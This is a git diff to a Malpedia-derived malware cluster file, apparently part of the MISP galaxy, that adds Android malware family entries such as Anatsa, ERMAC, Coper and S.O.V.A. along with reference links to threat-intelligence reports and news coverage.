diff --git a/clusters/malpedia.json b/clusters/malpedia.json index 448a708..cf86cd8 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -24,6 +24,7 @@ "https://github.com/fboldewin/FastCashMalwareDissected/", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware", "https://www.us-cert.gov/ncas/alerts/TA18-275A", "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html", @@ -38,12 +39,39 @@ "uuid": "e8a04177-6a91-46a6-9f63-6a9fac4dfa02", "value": "FastCash" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.888_rat", + "https://www.welivesecurity.com/2021/09/07/bladehawk-android-espionage-kurdish/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e98ae895-0831-4e10-aad1-593d1c678db1", + "value": "888 RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.aberebot", + "https://blog.cyble.com/2021/07/30/aberebot-on-the-rise-new-banking-trojan-targeting-users-through-phishing/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4b9c0228-2bfd-4bc7-bd64-8357a2da12ee", + "value": "Aberebot" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.actionspy", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/", + "https://about.fb.com/news/2021/03/taking-action-against-hackers-in-china/" ], "synonyms": [ "AxeSpy" @@ -101,6 +129,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.alien", "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html", + "https://info.phishlabs.com/blog/alien-mobile-malware-evades-detection-increases-targets", + "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/", "https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/" ], "synonyms": [], @@ -109,15 +139,42 @@ "uuid": "de483b10-4247-46b3-8ab5-77d089f0145c", "value": "Alien" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anatsa", + "https://www.cleafy.com/documents/teabot", + "https://labs.k7computing.com/?p=22407", + "https://www.threatfabric.com/blogs/smishing-campaign-in-nl-spreading-cabassous-and-anatsa.html", + "https://twitter.com/ThreatFabric/status/1394958795508523008", + "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/", + "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368", + "https://blog.nviso.eu/2021/05/11/android-overlay-attacks-on-belgian-financial-applications/", + "https://www.buguroo.com/hubfs/website/pdf/reports/buguroo-malware-report-Toddler_EN.pdf", + "https://twitter.com/_icebre4ker_/status/1416409813467156482" + ], + "synonyms": [ + "TeaBot", + "Toddler" + ], + "type": [] + }, + "uuid": "147081b9-7e59-4613-ad55-bbc08141fee1", + "value": "Anatsa" + }, { "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat", "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html", + "https://www.stratosphereips.org/blog/2021/3/29/dissecting-a-rat-analysis-of-the-androrat", "https://www.kaspersky.com/blog/mobile-malware-part-4/24290/", + "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-command-line-androrat", "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset", "https://github.com/DesignativeDave/androrat", + "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg", "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/" ], @@ -136,6 +193,7 @@ "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus", "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", + "https://0x1c3n.tech/anubis-android-malware-analysis", "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis", "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/", @@ -150,6 +208,7 @@ "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ", "https://community.riskiq.com/article/85b3db8c", "https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/", + "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html", "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", "https://pentest.blog/n-ways-to-unpack-mobile-malware/", @@ -268,7 +327,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.basbanke", - "https://twitter.com/LukasStefanko/status/1280243673100402690" + "https://twitter.com/LukasStefanko/status/1280243673100402690", + "https://seguranca-informatica.pt/hackers-are-again-attacking-portuguese-banking-organizations-via-android-trojan-banker/#.YHTDZS2tEUE", + "https://securelist.com/basbanke-trend-setting-brazilian-banking-trojan/90365/" ], "synonyms": [], "type": [] @@ -372,9 +433,12 @@ "https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf", "https://github.com/ics-iot-bootcamp/cerberus_research", "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://nur.pub/cerberus-analysis", "https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf", + "https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html", "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", + "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://twitter.com/AndroidCerberus" ], "synonyms": [], @@ -418,13 +482,52 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor", + "https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests", + "https://thewire.in/tag/pegasus-project", "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/", - "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", - "https://media.ccc.de/v/33c3-7901-pegasus_internals", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://twitter.com/HackSysTeam/status/1418223814387765258?s=20", + "https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/", "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", + "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus", + "https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/", + "https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus", + "https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/", + "https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/", + "https://forbiddenstories.org/about-the-pegasus-project/", + "https://www.theguardian.com/news/series/pegasus-project", + "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", + "https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat", + "https://www.washingtonpost.com/world/2021/07/19/india-nso-pegasus/", + "https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/", + "https://twitter.com/alexanderjaeger/status/1417447732030189569", + "https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto", + "https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/", + "https://twitter.com/billmarczak/status/1416801439402262529", + "https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/", + "https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure", + "https://citizenlab.ca/2021/07/amnesty-peer-review/", + "https://www.washingtonpost.com/investigations/interactive/2021/jamal-khashoggi-wife-fiancee-cellphone-hack/?itid=co_pegasus_5", + "https://media.ccc.de/v/33c3-7901-pegasus_internals", + "https://thewire.in/media/pegasus-project-spyware-indian-journalists", + "https://zetter.substack.com/p/pegasus-spyware-how-it-works-and", + "https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/", "https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/", - "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf" + "https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html", + "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/", + "https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/", + "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html", + "https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying", + "https://nex.sx/blog/2021/08/03/the-pegasus-project.html", + "https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/", + "https://github.com/AmnestyTech/investigations/tree/master/2021-07-18_nso", + "https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages", + "https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/", + "https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/", + "https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html", + "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf", + "https://objective-see.com/blog/blog_0x67.html" ], "synonyms": [ "JigglyPuff", @@ -504,6 +607,19 @@ "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a", "value": "Connic" }, + { + "description": "The malicious Coper apps have a modular architecture and a multi-stage infection mechanism. All known Coper banker trojan modifications target Colombian users to date. However, new versions targeting users from other countries are likely to emerge over time.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.coper", + "https://news.drweb.com/show/?p=0&lng=en&i=14259&c=0" + ], + "synonyms": [], + "type": [] + }, + "uuid": "70973ef7-e031-468f-9420-d8aa4eb7543a", + "value": "Coper" + }, { "description": "Poses as an app that can offer a \"corona safety mask\" but phone's address book and sends sms to contacts, spreading its own download link.", "meta": { @@ -672,6 +788,35 @@ "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b", "value": "Dvmap" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.elibomi", + "https://blog.cyble.com/2021/09/07/fake-income-tax-application-targets-indian-taxpayers/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-android-malware-targets-taxpayers-in-india/" + ], + "synonyms": [ + "Drinik" + ], + "type": [] + }, + "uuid": "63cc0b01-c92e-40e7-8669-48d10a490ffb", + "value": "Elibomi" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ermac", + "https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "602944f4-a86c-4a05-b98f-cfb525fb8896", + "value": "ERMAC" + }, { "description": "According to ThreatFabric, the app overlays 15 financial targets from UK, Italy, and Spain, sniffs 234 apps from banks located in Europe as well as crypto wallets.", "meta": { @@ -716,11 +861,26 @@ "uuid": "462bc006-b7bd-4e10-afdb-52baf86121e8", "value": "Exodus" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakeadblocker", + "https://www.welivesecurity.com/2021/07/20/url-shortener-services-android-malware-banking-sms-trojans/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d0ae2b6b-5137-4b64-be3e-4bbc9aa007a6", + "value": "FakeAdBlocker" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy", + "https://www.trendmicro.com/en_us/research/18/f/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users.html", + "https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/", "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681" @@ -764,11 +924,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.finfisher", - "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf", "https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/", - "https://github.com/linuzifer/FinSpy-Dokumentation", + "https://securelist.com/finspy-unseen-findings/104322/", "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", - "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/" + "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", + "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf", + "https://github.com/linuzifer/FinSpy-Dokumentation" ], "synonyms": [], "type": [] @@ -781,7 +942,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy", - "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" + "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/", + "https://mobisec.reyammer.io/slides" ], "synonyms": [], "type": [] @@ -806,19 +968,58 @@ "value": "FlexNet" }, { - "description": "PRODAFT describes FluBot as a banking malware, targeting Spain and potentially German-, Polish-, and English-speaking users. It uses a DGA for it's C&C.", + "description": "PRODAFT describes FluBot as a banking malware which originally targeted Spain. Since the first quarter of 2021 it has been targeting many other European countries as well as Japan. It uses a DGA for it's C&C and relies on both DNS and DNS-over-HTTPS for name resolution. Despite arrests of multiple people suspected of involvement with this malware in March of 2021, the campaign has only intensified since.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot", + "https://mobile.twitter.com/alberto__segura/status/1400396365759500289", + "https://twitter.com/alberto__segura/status/1399249798063087621?s=20", + "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon", + "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368", + "https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06", + "https://twitter.com/alberto__segura/status/1402615237296148483", + "https://twitter.com/malwrhunterteam/status/1359939300238983172", + "https://twitter.com/alberto__segura/status/1384840011892285440", + "https://medium.com/csis-techblog/the-brief-glory-of-cabassous-flubot-a-private-android-banking-botnet-bc2ed7917027", + "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/", + "https://securityintelligence.com/posts/story-of-fakechat-malware/", + "https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html", "https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9", - "https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf" + "https://blog.cyble.com/2021/09/09/flubot-variant-masquerading-as-the-default-android-voicemail-app/", + "https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users", + "https://news.netcraft.com/archives/2021/08/17/resurgent-flubot-malware-targets-german-and-polish-banks.html", + "https://blog.zimperium.com/flubot-vs-zimperium/", + "https://hispasec.com/resources/FedexBanker.pdf", + "https://twitter.com/alberto__segura/status/1395675479194095618", + "https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf", + "https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/", + "https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/", + "https://therecord.media/flubot-malware-gang-arrested-in-barcelona/", + "https://twitter.com/alberto__segura/status/1404098461440659459", + "https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/" + ], + "synonyms": [ + "Cabassous", + "FakeChat" ], - "synonyms": [], "type": [] }, "uuid": "ef91833f-3334-4955-9218-f106494e9fc0", "value": "FluBot" }, + { + "description": "Zimperium notes that this malware has hit more than 10,000 victims in 140+ countries using social media hijacking, 3rd party app stores and sideloading. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flytrap", + "https://blog.zimperium.com/flytrap-android-malware-compromises-thousands-of-facebook-accounts/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "24af5bcc-d4bd-42dd-aed4-f994b30b4921", + "value": "FlyTrap" + }, { "description": "", "meta": { @@ -926,6 +1127,19 @@ "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", "value": "GlanceLove" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gnatspy", + "https://www.trendmicro.com/en_us/research/17/l/new-gnatspy-mobile-malware-family-discovered.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a3b6a355-3afe-49ae-9f87-679c6c382943", + "value": "GnatSpy" + }, { "description": "", "meta": { @@ -952,6 +1166,20 @@ "uuid": "e111fff8-c73c-4069-b804-2d3732653481", "value": "GoldenRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goontact", + "https://blog.lookout.com/lookout-discovers-new-spyware-goontact-used-by-sextortionists-for-blackmail", + "https://blog.cyble.com/2021/09/03/spyware-variant-disguised-as-korean-video-app-targets-multiple-asian-countries/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "008ef3f3-579e-4065-ad0a-cf96be00becf", + "value": "goontact" + }, { "description": "Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed. ", "meta": { @@ -971,10 +1199,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff", - "https://blog.talosintelligence.com/2019/10/gustuffv2.html", "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", - "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://blog.talosintelligence.com/2019/10/gustuffv2.html", "https://www.group-ib.com/media/gustuff/", + "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html" ], "synonyms": [], @@ -1003,7 +1232,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hawkshaw", - "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/" + "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/", + "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-hawkshaw" ], "synonyms": [], "type": [] @@ -1116,11 +1346,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker", - "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/", "https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451", "https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/", "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus", - "https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html" + "https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html", + "https://labs.k7computing.com/index.php/joker-unleashes-itself-again-on-google-play-store/", + "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "https://labs.k7computing.com/?p=22199" ], "synonyms": [], "type": [] @@ -1169,6 +1402,22 @@ "uuid": "196d51bf-cf97-455d-b997-fc3e377f2188", "value": "KSREMOTE" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.little_looter", + "https://securityintelligence.com/posts/itg18-operational-security-errors-plague-iranian-threat-group/", + "https://twitter.com/malwrhunterteam/status/1337684036374945792", + "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-The-Kitten-That-Charmed-Me-The-9-Lives-Of-A-Nation-State-Attacker.pdf", + "https://www.youtube.com/watch?v=nilzxS9rxEM" + ], + "synonyms": [], + "type": [] + }, + "uuid": "41cb4397-7ae0-4a9f-894f-47828e768aa9", + "value": "LittleLooter" + }, { "description": "", "meta": { @@ -1187,6 +1436,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot", + "https://drive.google.com/file/d/144cOnM6fxfuBeP0V2JQshp8C0Zlk_0kH/view", + "https://isc.sans.edu/diary/27282", + "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html" ], @@ -1258,7 +1510,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.medusa", - "https://twitter.com/ThreatFabric/status/1285144962695340032" + "https://twitter.com/ThreatFabric/status/1285144962695340032", + "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html" ], "synonyms": [ "Gorgona" @@ -1301,10 +1554,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao", - "https://securelist.com/roaming-mantis-part-v/96250/", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", + "https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1", "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf", - "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681" + "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681", + "https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/", + "https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html", + "https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html", + "https://securelist.com/roaming-mantis-part-v/96250/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf" ], "synonyms": [ "Shaoye", @@ -1361,9 +1619,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.oscorp", - "https://cert-agid.gov.it/news/individuato-sito-che-veicola-in-italia-un-apk-malevolo/" + "https://cert-agid.gov.it/news/individuato-sito-che-veicola-in-italia-un-apk-malevolo/", + "https://www.cleafy.com/cleafy-labs/ubel-oscorp-evolution" + ], + "synonyms": [ + "UBEL" ], - "synonyms": [], "type": [] }, "uuid": "8d383260-102f-46da-8cc6-7659cbbd9452", @@ -1401,6 +1662,21 @@ "uuid": "a73375a5-3384-4515-8538-b598d225586d", "value": "PhantomLance" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pjobrat", + "https://mp.weixin.qq.com/s/VTHvmRTeu3dw8HFyusKLqQ", + "https://cybleinc.com/2021/06/22/android-application-disguised-as-dating-app-targets-indian-military-personnel/", + "https://labs.k7computing.com/?p=22537" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6fa6c769-2546-4a5c-a3c7-24dda4ab597d", + "value": "PjobRAT" + }, { "description": "", "meta": { @@ -1495,6 +1771,19 @@ "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f", "value": "RedAlert2" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.remrat", + "https://blogs.360.cn/post/analysis-of-RemRAT.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "23809a2b-3c24-41c5-a310-2b8045539202", + "value": "RemRAT" + }, { "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected.", "meta": { @@ -1531,6 +1820,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis", + "https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/", "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/", "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/" ], @@ -1662,6 +1952,20 @@ "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab", "value": "SMSspy" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.sova", + "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html", + "https://blog.cyble.com/2021/09/14/deep-dive-analysis-of-s-o-v-a-android-banking-trojan/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2aa95661-b63a-432e-8e5e-74ac93b42d57", + "value": "S.O.V.A." + }, { "description": "", "meta": { @@ -1710,9 +2014,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr", + "https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn", "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", - "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan", - "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/" + "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/", + "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/", + "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan" ], "synonyms": [], "type": [] @@ -1863,14 +2169,16 @@ "meta": { "refs": [ 